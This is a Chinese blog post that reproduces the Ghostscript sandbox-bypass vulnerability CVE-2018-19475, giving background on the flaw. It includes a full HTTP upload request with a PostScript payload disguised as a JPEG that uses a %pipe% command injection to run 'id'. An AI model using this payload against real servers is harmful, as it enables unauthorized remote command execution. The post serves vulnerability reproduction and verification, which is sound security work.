GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)

这篇博客介绍了Ghostscript 9.26之前的版本中存在一个安全漏洞,该漏洞源于psi/zdevice2.c文件的安全特征问题。攻击者可以利用此漏洞通过上传特制的POC图片文件执行命令。虽然通常情况下不会直接回显数据,但可以通过其他方式验证漏洞是否被利用。内容涉及到PostScript解析器、安全漏洞、命令注入和漏洞验证方法。
摘要由CSDN通过智能技术生成

漏洞背景

Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript(一种用于电子产业和桌面出版领域的页面描述语言和编程语言)解析器。该产品可显示Postscript文件以及在非Postscript打印机上打印Postscript文件。 Artifex Software Ghostscript 9.26之前版本中的psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限管理等安全措施。

漏洞复现

将POC作为图片上传,将执行命令id > /tmp/success && cat /tmp/success

POST /index.php HTTP/1.1
Host: your_ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279

------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--

在这里插入图片描述
通常真实情况下是不会回显数据的,需要其他方式去验证.

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值